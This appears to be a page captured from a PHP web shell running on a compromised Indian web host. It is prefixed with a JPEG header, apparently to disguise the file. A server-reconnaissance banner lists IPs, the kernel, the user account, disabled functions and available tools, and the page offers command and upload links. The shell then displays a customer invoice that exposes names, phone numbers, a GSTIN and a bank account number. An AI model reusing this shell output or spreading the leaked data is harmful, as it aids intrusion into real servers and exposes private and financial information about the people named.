����JFIF��x�x������Exif��MM�*���� ����E���J����������������(������������������
Server IP : 103.191.208.227 / Your IP : 18.118.4.64 Web Server : LiteSpeed System : Linux emphasis.herosite.pro 4.18.0-553.8.1.lve.el8.x86_64 #1 SMP Thu Jul 4 16:24:39 UTC 2024 x86_64 User : mhmsfzcs ( 1485) PHP Version : 8.1.31 Disable Function : show_source, system, shell_exec, passthru, exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home/mhmsfzcs/vflyorions.com/.well-known/../../ssl/../invoice.vflyorion.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Invoice</title> <style> body { font-family: Arial, sans-serif; margin: 0; padding: 20px; /*background-color: #f8f8f8;*/ } .invoice-box { max-width: 800px; margin: auto; padding: 30px; border: 1px solid #eee; box-shadow: 0 0 10px rgba(0, 0, 0, 0.15); background-color: #fff; } .invoice-box table { width: 100%; line-height: inherit; text-align: left; border-collapse: collapse; } .invoice-box table td { padding: 12px; vertical-align: top; } .invoice-box table tr td:nth-child(2) { text-align: right; } .invoice-box table tr.top table td { padding-bottom: 20px; } .invoice-box table tr.information table td { padding-bottom: 40px; } .invoice-box table tr.heading td { background: #eee; border-bottom: 1px solid #ddd; font-weight: bold; } .invoice-box table tr.details td { padding-bottom: 20px; } .invoice-box table tr.item td { border-bottom: 1px solid #eee; } .invoice-box table tr.item.last td { border-bottom: none; } .invoice-box table tr.total td:nth-child(2) { border-top: 2px solid #eee; font-weight: bold; } .title { font-size: 45px; line-height: 45px; color: #333; } .information td { padding: 0 5px 10px 0; } .subtotal, .tax, .total { padding: 10px 5px; } .terms { font-size: 12px; } @media only screen and (max-width: 600px) { .invoice-box table tr.top table td { width: 100%; display: block; text-align: center; } .invoice-box table tr.information table td { width: 100%; display: block; text-align: center; } } </style> </head> <body> <div class="invoice-box"> <div><lable><strong>TAX INVOICE</strong></lable>    <lable style="border: 1px solid gray; padding: 4px;color: gray;">ORIGINAL FOR RECIPIENT</lable></div> <table cellpadding="0" cellspacing="0"> <tr class="top"> <td colspan="5"> <table> <tr> <td class="title"> <img src="logo.png" style="width:100%; max-width:150px;"> </td> <td> <div style="text-align:right;"> <strong>Vflyorions Technologies Pvt Ltd</strong><br> Near Dharampeth mahila Bank, opposite Bank of Baroda,<br> Ward Number 3, Parsodi, Trimurtee Nagar,<br> Nagpur, Maharashtra 440022<br> Mobile: 9146902678<br> GSTIN: 27AAGCV6291H1ZW </div> </td> </tr> </table> </td> </tr> <tr class="information" style="border: 1px solid black;"> <td colspan="5"> <table> <tr> <td style="text-align: left; padding: 0;"> <strong>BILL TO:</strong><br> Pratik Jain<br> Mobile: 9929260046 </td> <td style="padding: 0;"> <strong>Invoice No.: JULY302</strong><br> Invoice Date: 06-07-2024 </td> </tr> </table> </td> </tr><br> <tr class="heading"> <td style="border-bottom: 1px solid #ddd;">SERVICES</td> <td style="text-align: center; border-bottom: 1px solid #ddd;">QTY.</td> <td style="text-align: center; border-bottom: 1px solid #ddd;">RATE</td> <td style="text-align: center; border-bottom: 1px solid #ddd;">TAX</td> <td style="text-align: right; border-bottom: 1px solid #ddd;">AMOUNT</td> </tr> <tr class="item"> <td>SINGLE 2500</td> <td style="text-align: center;">1.0</td> <td style="text-align: center;">3000.0</td> <td style="text-align: center;">540.0 (18.0%)</td> <td style="text-align: right;">3000.0</td> </tr> <tr class="subtotal"> <td colspan="4" style="text-align: right; padding-right: 20px;">SUB TOTAL</td> <td style="text-align: right;">3000.0</td> </tr> <tr class="tax"> <td colspan="4" style="text-align: right; padding-right: 20px;">CGST @9.0%</td> <td style="text-align: right;">₹ 270.0</td> </tr> <tr class="tax"> <td colspan="4" style="text-align: right; padding-right: 20px;">SGST @9.0%</td> <td style="text-align: right;">₹ 270.0</td> </tr> <tr class="total"> <td colspan="4" style="text-align: right; padding-right: 20px;">GRAND TOTAL</td> <td style="text-align: right;">3540.0</td> </tr> <tr class="information"> <td colspan="5"> <table> <tr> <td style="padding: 0;"> <strong>Bank Details:</strong><br> Name: Samuel Titus<br> IFSC Code: YESB0000028<br> Account No: 00286300001883<br> Bank: Yes Bank, NAGPUR, MAHARASHTRA </td> </tr> </table> </td> </tr> <tr class="information"> <td colspan="5" class="terms"> Notes:<br> -<br> Terms and Conditions:<br> 1. Once work is placed amount will not be refunded.<br> 2. File name should be same as given in the mail. </td> </tr> </table> </div> </body> </html>